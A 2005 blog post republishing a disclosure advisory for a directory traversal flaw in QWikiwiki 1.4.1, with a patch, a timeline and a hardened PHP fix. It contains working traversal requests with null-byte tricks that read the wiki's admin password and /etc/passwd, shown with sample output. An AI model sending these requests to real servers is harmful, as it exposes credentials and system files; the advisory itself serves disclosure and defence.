Vulnerability in QWikiwiki

January 7th, 2005

I have been researching PHP vulnerabilities quite a bit and reviewing a lot of code looking for security flaws. I will publish every vulnerability I discover here, in addition to sending it to the software authors and to the security lists (Bugtraq, SecurityFocus, …). Here is the first of the vulnerabilities.

Title: QWikiwiki directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 01/01/2005
Severity: Critical

Summary: 

QwikiWiki is driven by one core design goal: simplicity. This design goal is codified into three key principles: 

  • Self Sufficiency: QwikiWiki requires only a web server and PHP. 
  • Zero-Edit Deployment: QwikiWiki is immediately usable “out of the box”. 
  • Minimalist Featureset: QwikiWiki is not everything to everybody.

QwikiWiki uses only cookies and the file system, and thus does not require a MySQL server or any other database support. Data is stored in simple text files, and backups are just complete copies of the data directory. Ain’t nothing fancier than it need be.
(from vendor site: http://www.qwikiwiki.com)

QWikiwiki does not validate the page parameter, which allows an attacker to read arbitrary files from the server.

This vulnerability has been tested with QWikiwiki 1.4.1

Details:

To read the QWikiwiki admin password:

REQUEST: http://[SERVER]/qwiki/index.php?page=../_config.php%00

RESPONSE (visible in the HTML source):

[…]
$QW_CONFIG['title'] = "QwikiWiki";
$QW_CONFIG['adminName'] = "David Barrett";
$QW_CONFIG['adminPassword'] = 'changeme!';

We can also read any file the web server has permission to read:

REQUEST: http://[SERVER]/qwiki/index.php?page=../../../../../../etc/passwd%00

RESPONSE:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[…]

Solution:

Temporary fix: in the file _wikiLib.php, replace

function QWCreateDataPath( $page, $extension ) {
    return 'data/' . $page . $extension;
}

with

function QWCreateDataPath( $page, $extension ) {
    if (strpos($page, "..") === false) {
        return 'data/' . $page . $extension;
    } else {
        return '';
    }
}
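The temporary fix above only rejects page names containing "..". As an added example (my own code, not part of the advisory and not QWikiwiki's code), here is a stricter replacement that allow-lists the page name instead of black-listing one pattern, rejects embedded NUL bytes such as the %00 used in the requests above, and, as a second layer, checks with realpath() that an existing file actually resolves inside the data directory. The data directory location, the allowed extensions and the page-name character set are assumptions chosen for the example.

```php
<?php
// Added example: hardened replacement for QWCreateDataPath().
// Assumptions (not from QWikiwiki): pages live in "data/" beneath this
// script's directory, page names use only letters, digits, "_" and "-",
// and the only extensions the wiki uses are ".txt" and ".html".

define('QW_DATA_DIR', __DIR__ . '/data');

function QWCreateDataPathSafe(string $page, string $extension): ?string
{
    // 1. Allow-list the page name. Anything else (including "..", "/",
    //    "\\" and a NUL byte from a %00 in the URL) is rejected before any
    //    file-system call is made. \A and \z anchor the whole string.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }

    // 2. Only allow the extensions the application itself uses (assumption).
    if (!in_array($extension, ['.txt', '.html'], true)) {
        return null;
    }

    $candidate = QW_DATA_DIR . '/' . $page . $extension;

    // 3. Defence in depth: if the file already exists, resolve symlinks and
    //    "."/".." components and confirm it is still under the data directory.
    //    A page that does not exist yet passes on the strength of step 1.
    if (file_exists($candidate)) {
        $dataReal = realpath(QW_DATA_DIR);
        $fileReal = realpath($candidate);
        if ($dataReal === false || $fileReal === false) {
            return null;
        }
        $prefix = $dataReal . DIRECTORY_SEPARATOR;
        if (strncmp($fileReal, $prefix, strlen($prefix)) !== 0) {
            return null; // resolved outside data/ (e.g. via a symlink)
        }
    }

    return $candidate;
}

// Constructed inputs: the two requests from the advisory, URL-decoded as
// PHP would see them, plus a legitimate page name.
$samples = [
    urldecode('../_config.php%00'),
    urldecode('../../../../../../etc/passwd%00'),
    'HomePage',
];

foreach ($samples as $p) {
    $path = QWCreateDataPathSafe($p, '.txt');
    printf("%-40s => %s\n", addcslashes($p, "\0"), $path ?? 'REJECTED');
}
```

Run it from the command line (php this_file.php). The first two inputs are rejected by the allow-list in step 1 and never reach the file system; only "HomePage" yields a path. Note that the original vulnerable behaviour depends on fopen()/include-style calls honouring the NUL byte as a string terminator, so checking the page name before building the path, rather than inspecting the path afterwards, is what closes that class of bypass.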

Timeline: 

01/01/2005 – Vulnerability found
01/01/2005 – Vendor contacted
01/01/2005 – Vendor confirmed bug
04/01/2005 – Bug published in vendor page and advisory released
